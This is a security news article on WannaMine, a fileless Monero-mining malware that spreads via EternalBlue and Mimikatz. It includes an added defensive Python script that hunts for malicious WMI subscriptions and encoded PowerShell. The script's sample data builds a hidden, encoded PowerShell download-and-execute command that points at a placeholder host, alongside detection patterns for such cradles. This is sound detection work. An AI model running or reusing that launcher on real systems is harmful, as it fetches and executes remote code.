HackRead
Fileless WannaMine Cryptojacking Malware Using NSA Exploit

February 2nd, 2018 Waqas Security, Malware, NSA 0 comments

Forget WannaCry and welcome WannaMine, a fileless cryptojacking malware that spreads with the leaked NSA exploit known as EternalBlue.

Cryptocurrencies are in high demand, and the market value of Bitcoin, Ethereum, Litecoin and Monero has soared, making cryptocurrency wallets far more liquid and far more valuable than they were a year ago.

It was only a matter of time before cybercriminals went after that value, and their method of choice is mining: running the computationally expensive calculations that earn new coins. Mining burns processor time and electricity, and it will happily consume the full capacity of even the most powerful computer systems.

More: New Monero mining malware infected 500K PCs by using 2 NSA exploits

What's more disturbing is that cybercriminals have now built cryptojacking malware whose sole purpose is to steal CPU time from infected computers. One such family is WannaMine. It uses leaked NSA (National Security Agency) hacking tools to break into computers and then burns their processor time mining cryptocurrency for the attacker.

Here, we must recall the NSA's Windows exploit known as EternalBlue, which was leaked in April 2017 by the hacking group Shadow Brokers and was then used to launch the disastrous WannaCry ransomware that caused havoc worldwide and locked down NHS systems. WannaCry infected around 230,000 computers in nearly 150 countries, and weeks later the same exploit helped NotPetya spread. That exploit is now being used once more, this time to mine Monero with the cryptojacking malware WannaMine.

WannaMine was identified by security firm Panda in October 2017, when it was caught mining Monero with hijacked CPU cycles on infected computers. CrowdStrike has since reported a sharp rise in WannaMine activity, with infections doubling over the last few months. In some cases it crippled company operations for days or weeks while it used their CPUs to mine Monero.

WannaMine is fileless malware that, in CrowdStrike's words, uses advanced tactics and techniques to "maintain persistence within a network and move laterally from system to system. WannaMine uses credentials acquired with the credential harvester Mimikatz to attempt to propagate and move laterally with legitimate credentials," wrote CrowdStrike security researchers.

Attackers use a wide range of techniques to get onto the first machine, from phishing emails to compromised remote access. Once inside, WannaMine's use of Mimikatz means that patching against EternalBlue is not enough on its own: a fully patched machine can still be taken over if WannaMine has already harvested valid credentials for it from another host. Only when that credential-based lateral movement fails does it fall back to the exploit. "If unsuccessful, WannaMine attempts to exploit the remote system with the EternalBlue exploit," read the blog post by CrowdStrike researchers.

WannaMine uses built-in Windows components, Windows Management Instrumentation (WMI) and PowerShell, to perform its malicious tasks. Because it is fileless and lives inside those legitimate components rather than dropping an executable to disk, file-based antivirus scanning has little to inspect, which makes it hard to detect or block. It is not the first fileless malware, but it is considerably more sophisticated than earlier miners such as Adylkuzz, which had to download a separate application, CPUMiner, in order to operate.
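The combination described above, a WMI permanent event subscription whose consumer launches a hidden, encoded PowerShell command, is what a defender has to hunt for when there is no file on disk. The script below is an added example, not code from HackRead, CrowdStrike or the malware itself: it correlates WMI filter, consumer and binding records with process creations, flags consumers and processes that start PowerShell with hiding or encoding switches or a download cradle, and decodes the -EncodedCommand operand (base64 of UTF-16LE text). The event records are constructed for the example; their field names loosely follow Sysmon Event IDs 1, 19, 20 and 21, and the subscription names, URL and indicator list are assumptions, not observed WannaMine artefacts.

```python
"""Hunt for WannaMine-style fileless persistence in Windows telemetry.

Added example, not code from HackRead, CrowdStrike or the malware itself.
Field names loosely follow Sysmon Event IDs 1, 19, 20 and 21 (assumption);
every record below is constructed, not a real capture.
"""
import base64
import binascii
import re

# PowerShell accepts -e, -ec, -enc and -EncodedCommand; the operand is base64 of UTF-16LE text.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")

# Indicators checked in a command line and in its decoded payload (assumed heuristics).
INDICATORS = {
    "hidden-window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "no-profile": re.compile(r"(?i)-nop(?:rofile)?\b"),
    "non-interactive": re.compile(r"(?i)-noni(?:nteractive)?\b"),
    "download-cradle": re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest"),
    "invoke-expression": re.compile(r"(?i)\biex\b|invoke-expression"),
}


def encode_powershell(script: str) -> str:
    """Produce the operand PowerShell expects after -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(command_line: str):
    """Return the decoded -EncodedCommand payload, or None when there is none."""
    m = ENCODED_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyse_command_line(command_line: str):
    """Return (sorted indicator names, decoded payload or None) for one command line."""
    decoded = decode_encoded_command(command_line)
    text = command_line if decoded is None else command_line + "\n" + decoded
    hits = {name for name, rx in INDICATORS.items() if rx.search(text)}
    if decoded is not None:
        hits.add("encoded-command")
    return sorted(hits), decoded


def _wmi_name(path: str) -> str:
    """Extract X from a WMI object path such as  __EventFilter.Name="X"  ."""
    return path.split('"')[1]


def hunt(events):
    """Correlate subscription and process events; return a list of findings."""
    filters = {e["Name"]: e["Query"] for e in events if e["event_id"] == 19}
    consumers = {e["Name"]: e for e in events if e["event_id"] == 20}
    findings = []
    for e in events:
        if e["event_id"] == 21:  # a binding ties a filter (trigger) to a consumer (action)
            consumer = consumers.get(_wmi_name(e["Consumer"]))
            if consumer is None or consumer["Type"] not in ("Command Line", "Active Script"):
                continue
            hits, decoded = analyse_command_line(consumer["Destination"])
            if hits:
                findings.append({"kind": "wmi-subscription", "consumer": consumer["Name"],
                                 "filter": _wmi_name(e["Filter"]),
                                 "query": filters.get(_wmi_name(e["Filter"])),
                                 "indicators": hits, "decoded": decoded})
        elif e["event_id"] == 1:  # process creation
            hits, decoded = analyse_command_line(e["CommandLine"])
            # PowerShell spawned by the WMI provider host is how a CommandLineEventConsumer fires.
            from_wmi = (e["Image"].lower().endswith("powershell.exe")
                        and e["ParentImage"].lower().endswith("wmiprvse.exe"))
            if from_wmi or len(hits) >= 2:
                findings.append({"kind": "powershell-from-wmi" if from_wmi else "suspicious-powershell",
                                 "image": e["Image"], "parent": e["ParentImage"],
                                 "indicators": hits, "decoded": decoded})
    return findings


# Constructed sample telemetry: one malicious subscription chain plus benign noise.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/m.ps1')"
LAUNCHER = "powershell.exe -NoP -NonI -W Hidden -EncodedCommand " + encode_powershell(PAYLOAD)
SAMPLE_EVENTS = [
    {"event_id": 19, "Name": "Perf Filter", "EventNamespace": "root\\cimv2",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 3600 "
              "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"},
    {"event_id": 20, "Name": "Perf Consumer", "Type": "Command Line", "Destination": LAUNCHER},
    {"event_id": 21, "Consumer": 'CommandLineEventConsumer.Name="Perf Consumer"',
     "Filter": '__EventFilter.Name="Perf Filter"'},
    {"event_id": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "CommandLine": LAUNCHER},
    # benign: an administrator's backup script and a consumer that only writes an event log entry
    {"event_id": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"event_id": 20, "Name": "Log Consumer", "Type": "Event Log", "Destination": "Application"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

Run as a script it reports two findings from the constructed sample: the subscription chain (filter, consumer, decoded download cradle) and the PowerShell process whose parent is WmiPrvSE.exe, while the administrator's backup script and the log-only consumer are left alone. The same logic can be fed from real Sysmon or Windows event logs, or from a dump of the root\subscription namespace taken with Get-CimInstance; the indicator regexes are a starting point and should be tuned to what legitimate automation in your environment looks like.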

WannaMine is not as destructive as NotPetya or WannaCry, since it does not lock anyone out of their computers, but it can consume 100% of the CPU capacity of an affected environment, which is a serious concern for firms running data centres or server farms.

For individual users it means a PC or laptop that becomes noticeably slower. To protect systems, keep endpoint protection up to date, apply the Windows update that closes the EternalBlue vulnerability (MS17-010), and limit the reuse of administrative credentials across machines so that credentials stolen with Mimikatz on one host cannot be used to log in to the rest. Checking for unexpected WMI event subscriptions and for PowerShell launched by the WMI provider host will catch the persistence mechanism that this malware relies on.

  • Tags
  • Cryptocurrency
  • Cryptojacking
  • Fileless
  • internet
  • Malware
  • Monero
  • NotPetya
  • NSA
  • Privacy
  • security
  • WannaCry
  • WannaMine
Waqas

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in the cyber security and tech world. I am also into gaming, reading and investigative journalism.

HACKREAD is a News Platform that centers on InfoSec, Cyber Crime, Privacy, Surveillance and Hacking News with full-scale reviews on Social Media Platforms & Technology trends. Founded in 2011, HackRead is based in the United Kingdom.
